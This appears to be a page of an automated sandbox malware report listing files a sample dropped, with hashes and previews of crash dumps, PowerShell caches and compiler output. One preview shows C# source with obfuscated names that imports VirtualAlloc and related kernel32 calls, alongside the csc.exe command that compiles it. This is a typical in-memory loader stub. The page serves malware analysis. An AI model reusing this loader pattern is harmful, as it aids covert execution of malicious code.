                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER72FC.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4659
                        Entropy (8bit):4.4259860118465895
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjR8fm8M4J2+nFJ+q8vQ+GdKcQIcQw0cd:uITfRcR9grsqYqJZKadKkw0cd
                        MD5:76F9EB4132E4B59649BB0CD22F905041
                        SHA1:D80A6535CECCEDEFF04EDD4D83E9EDCCE2B7A9FE
                        SHA-256:22B8C3BC47CFDCC2DF8D5C12A9B9B45302C87A01AC9AB4734F5DCFC4FDC06883
                        SHA-512:0D2986DDC0B5D6AD3CADDEA6AA3600F864EC6069AC3E2A7D1EDC4C13354F75F367F83444984F6B3AD7C3F4CB811785322DC6D6090F34386E3D31251110359982
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FAC.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:42 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34690
                        Entropy (8bit):2.0271582616456114
                        Encrypted:false
                        SSDEEP:192:jap/V6OOdO1SqQ8OYziEi41/fCltDOs+c7qy:cBOQ1GYLi4xC5
                        MD5:98823C3E4F054A9165D438EC4E2CEB1C
                        SHA1:051919123D1748F229F193164FECCE69812CA866
                        SHA-256:DB59C27D1626DA7874EE219BADAAA298206B57DADFFE33BE9C8450D3D7484335
                        SHA-512:39DD7AFE4D239B7FD65B96799E7AB437B2FF8A46C49830F3F859E86723BF8F01780F6F1680971EF005B170CC978A639896D9C513E68CD33F1684E784EDFF1F56
                        Malicious:false
                        Preview:MDMP....... .......R..b........................L...........$...............~!..........`.......8...........T...........(...Zw...........................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER82CA.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8334
                        Entropy (8bit):3.700853069434835
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+q6bfEM6Y4CSU7jmjTgmfJSG+prO89bZhsfhzm:RrlsNiD6YM6YNSUXmjTgmfJSNZafY
                        MD5:F17272FA1DC6E944333E729B686AC8BF
                        SHA1:A2E3FB6A6488B24F8FD3F70D3BA0F38E339527C7
                        SHA-256:8B35122280A22F36A355172B77CC9E0FBF6E4E3C9A74396850043B7F7E3675CF
                        SHA-512:CF1E6CB0A4EEEEE9655DD01122F966E4C65B5A32606D0DBB147BC4BAC8A6C7AC3E3606082770B631D46D2D95144271A0C4F99CBEC577C15C03AA41E223985B9D
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8461.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.469500510780283
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjq8fm8M4J2+EZFV+q849hYdKcQIcQw09d:uITfRcR9grsqYzJKprYdKkw09d
                        MD5:FBDC6EC9B2BD979AFA8A53D339B3D0B0
                        SHA1:E7F7A92AC9B2945B91CF2487BCA9463015E0E39B
                        SHA-256:908D3289EBFABE37133537239D2AA37249ABD4950E0C01B6B698FB11E3240B2C
                        SHA-512:454FEAE4EC651A1358A949D0CCCD895265ECA8B654B9D11D7E3EC00DFD082F1A6AD0A206FB22B217FF6489A1F4B5AC5A8D630FBF50F27D6CF48C728C9F12A4B6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CE9.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:51 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):47714
                        Entropy (8bit):2.2902635791349857
                        Encrypted:false
                        SSDEEP:192:Oqz/TzQWQpBO1wwzp2PiWpUrBGyL3TVgKFdzhRygvugloYxOOYzUEqqCGNmDN8Qo:ndL1Rpw+rgyfSeZhDvsYx5Y5qqxV
                        MD5:0FC4337E7B15D8ABB2CD6C659E08B905
                        SHA1:7CE7EB1E2790D30232654AB47D5453CE97A0F618
                        SHA-256:084CA58989DD4CF4FFB474DBD33375FD916E5F9C66028AD515776FD792EB7A15
                        SHA-512:1C07F7850F69149ABCA03F0DA7FE500FA65DE4FDAC77CA04DC0DA08DB121B6A1FE598211EC0BDB878257D70FB79233E9BFB3EBD87C647A830FF55D9648D0A5B0
                        Malicious:false
                        Preview:MDMP....... .......[..b........................L...........$...............~!..........`.......8...........T...............b............................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA650.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8290
                        Entropy (8bit):3.693325525971125
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+L6b+c6Y4iSUJZmgmfDSitl+pDr89bjhsf2hm:RrlsNi66Cc6YNSUJogmfDSsjafh
                        MD5:F26E02402044828537B8F1E48C9AED33
                        SHA1:9A3F38DA9BBC6B8CC52AACBA76BB035B5C429FC6
                        SHA-256:8BB6A39C1780F107AF1BD5AE064536CC39C55B189CDFE9E468EB513FF8A3C511
                        SHA-512:86398A402390F4896C623A77DF832580C843C351FC1A6488F912B4AAE9CEC66B7C020CD5CF0A6145F22B15C51D26C3573F5A2CFC718AC46D14F4EFE539EBC6CF
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7A9.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4558
                        Entropy (8bit):4.435949177836784
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjC8fm8M4J2+wFoml+q84BydKcQIcQw09d:uITfRcR9grsqYrJGlodKkw09d
                        MD5:7F80AD412C3577DDB6529872079E5DC2
                        SHA1:6A49967DC7C2A9F9A006CFCB0B8B0841CEBA3C20
                        SHA-256:70D44B739211FE25940AA6074488F57E481D0EDC6151ECE1FAEB6BF4AC576349
                        SHA-512:B910A709F8DE77ADFF935F931A15DE448CDA1FE689D61F8CC6E172E3CB4370288996ABAA8B095B045DD88AB137B6A74D3EDCF14450F5CEDCDEE9B53A0AB8E548
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11606
                        Entropy (8bit):4.8910535897909355
                        Encrypted:false
                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                        MD5:F84F6C99316F038F964F3A6DB900038F
                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                        Malicious:false
                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192
                        Entropy (8bit):5.325275554903011
                        Encrypted:false
                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                        MD5:05CF074042A017A42C1877FC5DB819AB
                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                        Malicious:false
                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                        C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.0.cs

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):392
                        Entropy (8bit):4.988829579018284
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                        MD5:80545CB568082AB66554E902D9291782
                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                        Malicious:false
                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                        C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):369
                        Entropy (8bit):5.225931084277001
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fyL4qzxs7+AEszIwkn23fyL4hyAn:p37Lvkmb6KRfK0qWZEifK0hyA
                        MD5:1147F18A3762C2E65411CE6823AF9BC9
                        SHA1:6ECE2426A2EFF916432894517BB4FE044C19EB41
                        SHA-256:A0BA5C47D8E295B98D5632BE399DB0266EC788A498EE38B1F866606CF0371CFE
                        SHA-512:59AEC2E13CD44C74F199087DC9ACF1B0783AE18A1A1AA6EA2A21E21FE01C4B23856D5B13D1C6059B22647E497D525846E925B8E88DB147B109BC6D01316963F1
                        Malicious:false
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.0.cs"

                        C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.590914792113435
                        Encrypted:false
                        SSDEEP:24:etGSw/u2Bg85z7xlfwZD6KegdWqtkZfl7ttzWI+ycuZhNBakSvPNnq:6BYb5hFCD6KfWdJl7q1ulBa3tq
                        MD5:2456F4F945820582283911A7EFBBAB4A
                        SHA1:A4D366666624B4B4BDC85D0D43AD42D5B143EAAE
                        SHA-256:04FAD7B77D41905FAAC17B0633940B8026808CC4296EB0669106D92F76998D48
                        SHA-512:BE02502697D386EF07E704980E208710BA31838B1E7A53D96B28C73BC5819CF2A69386212774AB30CDBE2E3FA465A2A17E099F72D167DB917B0E29A0929589AD
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                        C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.out

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.320005711190707
                        Encrypted:false
                        SSDEEP:24:AId3ka6KRfK0LEifK0E1KaM5DqBVKVrdFAMBJTH:Akka6CK0LEuK0E1KxDcVKdBJj
                        MD5:3D782FAB19C707768E41E7C6FD17F9CE
                        SHA1:BDDE99DA59D61B59428B4AFBE9E80DBF099A337A
                        SHA-256:A7AA49D3BB4509B2E29CA40A4F7ACE22DF519B30A70E9D8559285413DF09F1E5
                        SHA-512:504959F1550C284059481377EEDCD0EBA18FCE37CB712978E9384D1265D337656206CF917B957B2F62155C04211D46B53ECCB1866035AF079EFB5D1E297D2AD1
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                        C:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.084270469417881
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNBakSvPNnqX
                        MD5:CFBBE6F0EEA525E68A757A7B26894059
                        SHA1:1C7A114ED6AE3438F26D4CD42693C46C4C75B183
                        SHA-256:B9C36592225D7FEDEA84BDA23F6C6A58AA6C7C63C3F2B15A397C8E8B415A35B3
                        SHA-512:B0D4A223CD38A398F74D16393F30CD8DAF05C4F47D1DF538B373A78918D86F1F6D191BDDC325D8EE783E8741FC70305038507EA008C29396112964A22B83CE00
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                        C:\Users\user\AppData\Local\Temp\RESBB61.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.9878869287849548
                        Encrypted:false
                        SSDEEP:24:H/e9EuZfnB08DfHYhKdNWI+ycuZhNmakSuPNnq9qd:mBBH6Kd41ulma3yq9K
                        MD5:3608CB888C2146BE6248E3EC15D708A2
                        SHA1:DF5A4DE39B0509EDC21713E7A845ABA69A174A2F
                        SHA-256:41BCA26ACE483C3A60E081F82CAA1ABBEC23FEBB13944D95879AE77B7907C67B
                        SHA-512:9947B5D2268F94CF8AF79477FB8CFEFEC12AA3DC700E04639FD75A3835FF0452A7683424F661DAAE18F4CBE0F831F1BEEA12DD9FB76A2502B7CECC63B1F98AB8
                        Malicious:false
                        Preview:L......b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP.................;..:....((...*F..........4.......C:\Users\user\AppData\Local\Temp\RESBB61.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                        C:\Users\user\AppData\Local\Temp\RESDBAB.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.989795686656622
                        Encrypted:false
                        SSDEEP:24:H3e9E2+fKMmwUcDfHchKdNWI+ycuZhNBakSvPNnq9qd:JKpKOKd41ulBa3tq9K
                        MD5:67B35BBF8CFA938C7974E498B4E179F3
                        SHA1:ADA46C31936B0C64A83F3B8017245EF5053C7177
                        SHA-256:C3818266B1CD84EDC45414C3BBFF11136345086CBC911B0FA8D21E8BC7A440A6
                        SHA-512:F9FD32A04842C528E2AAA9F8B47053AE800FDB9C9DEAA445F1BF9D6EBAF4A1B5FA48CC055BCADC821BB147E0F3D5AE1ED0C198A65BAA25C2199A5994D28CEBF6
                        Malicious:false
